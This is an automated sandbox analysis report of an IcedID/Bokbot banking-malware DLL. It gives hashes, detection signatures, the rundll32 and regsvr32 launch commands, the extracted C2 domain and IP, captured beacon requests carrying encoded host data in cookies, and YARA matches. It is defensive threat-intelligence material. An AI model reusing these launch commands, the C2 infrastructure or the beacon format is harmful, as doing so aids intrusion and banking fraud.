
Windows Analysis Report
J5V5DR.dll

Overview

General Information

Sample Name: J5V5DR.dll
Analysis ID: 632638
MD5: 9b692f43d575acb739decfc809db7f2e
SHA1: bc42c60590cb908e765e2d97e8b3a92b4616cd30
SHA256: 0581f0bf260a11a5662d58b99a82ec756c9365613833bce8f102ec1235a7d4f7
Tags: dll, exe, IcedID

Detection

IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected IcedID
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Yara signature match
Tries to load missing DLLs
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Registers a DLL
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality for execution timing, often used to detect debuggers

Classification

  • System is w10x64
  • loaddll64.exe (PID: 6832 cmdline: loaddll64.exe "C:\Users\user\Desktop\J5V5DR.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 6840 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 6860 cmdline: rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 6848 cmdline: regsvr32.exe /s C:\Users\user\Desktop\J5V5DR.dll MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 6868 cmdline: rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6920 cmdline: rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,HdQZgnE MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 7092 cmdline: rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,IfkPmdu MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
{"Campaign ID": 109932505, "C2 url": "ilekvoyn.com"}
Source | Rule | Description | Author | Strings
00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security
00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security
00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security
00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_IcedID_6 | Yara detected IcedID | Joe Security
00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security
Source | Rule | Description | Author | Strings
4.2.rundll32.exe.1ede3f59841.1.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
  • 0x1bd0:$internal_name: loader_dll_64.dll
  • 0x1f08:$string6: WINHTTP.dll
  • 0x1bf4:$string7: DllRegisterServer
  • 0x1c06:$string8: PluginInit
4.2.rundll32.exe.1ede3fcb648.2.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
  • 0x1bd0:$internal_name: loader_dll_64.dll
  • 0x1f08:$string6: WINHTTP.dll
  • 0x1bf4:$string7: DllRegisterServer
  • 0x1c06:$string8: PluginInit
0.2.loaddll64.exe.239d139d591.2.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
  • 0x1bd0:$internal_name: loader_dll_64.dll
  • 0x1f08:$string6: WINHTTP.dll
  • 0x1bf4:$string7: DllRegisterServer
  • 0x1c06:$string8: PluginInit
2.2.regsvr32.exe.180000000.2.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
  • 0x27d0:$internal_name: loader_dll_64.dll
  • 0x3198:$string0: _gat=
  • 0x3048:$string1: _ga=
  • 0x30a0:$string2: _gid=
  • 0x3118:$string3: _u=
  • 0x303a:$string4: _io=
  • 0x3054:$string5: GetAdaptersInfo
  • 0x2b08:$string6: WINHTTP.dll
  • 0x27f4:$string7: DllRegisterServer
  • 0x2806:$string8: PluginInit
  • 0x3134:$string9: POST
2.2.regsvr32.exe.180000000.2.unpack | JoeSecurity_IcedID_6 | Yara detected IcedID | Joe Security

No Sigma rule has matched
No Snort rule has matched

              AV Detection

Source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: IcedID {"Campaign ID": 109932505, "C2 url": "ilekvoyn.com"}
Source: J5V5DR.dll | Virustotal: Detection: 13%
Source: J5V5DR.dll | ReversingLabs: Detection: 12%
Source: Yara match | File source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll64.exe PID: 6832, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6860, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6868, type: MEMORYSTR
Source: Yara match | File source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE
Source: J5V5DR.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

              Networking

Source: C:\Windows\System32\rundll32.exe | Domain query: ilekvoyn.com
Source: C:\Windows\System32\rundll32.exe | Network Connect: 64.227.182.2 80
Source: Malware configuration extractor | URLs: ilekvoyn.com
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Connection: Keep-Alive | Cookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:38333943384646433645323531353035; __io=0; _gid=67AFED4C8997 | Host: ilekvoyn.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Connection: Keep-Alive | Cookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:31323037463731444444363041413743; __io=0; _gid=67AFED4C8997 | Host: ilekvoyn.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Connection: Keep-Alive | Cookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:45324342413344443837343036393933; __io=0; _gid=67AFED4C8997 | Host: ilekvoyn.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Connection: Keep-Alive | Cookie: __gads=109932505:1:3929:119; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:37383344384639433838463446394437; __io=0; _gid=67AFED4C8997 | Host: ilekvoyn.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 23 May 2022 19:00:41 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 23 May 2022 19:00:41 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 23 May 2022 19:00:41 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 23 May 2022 19:00:54 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0
Source: loaddll64.exe, 00000000.00000002.306399602.00000239D2CF0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279011932.000001D397AA0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.279346138.000001EDE5CF0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ilekvoyn.com/
Source: rundll32.exe, 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ilekvoyn.com/4
Source: rundll32.exe, 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ilekvoyn.com/Y
Source: rundll32.exe, 00000004.00000002.279383760.000001EDE5D16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ilekvoyn.com/u5
Source: regsvr32.exe, 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ilekvoyn.com:80/
Source: loaddll64.exe, 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://shapka-youtube.ru/
Source: unknown | DNS traffic detected: queries for: ilekvoyn.com

              E-Banking Fraud

Source: Yara match | File source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll64.exe PID: 6832, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6860, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6868, type: MEMORYSTR
Source: Yara match | File source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE

              System Summary

              barindex
              Source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 4.2.rundll32.exe.1ede3f59841.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 4.2.rundll32.exe.1ede3fcb648.2.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 0.2.loaddll64.exe.239d139d591.2.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 3.2.rundll32.exe.1d395c5b848.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 2.2.regsvr32.exe.b99811.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 2.2.regsvr32.exe.c091b8.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 3.2.rundll32.exe.1d395be9aa1.2.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 0.2.loaddll64.exe.239d1412178.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
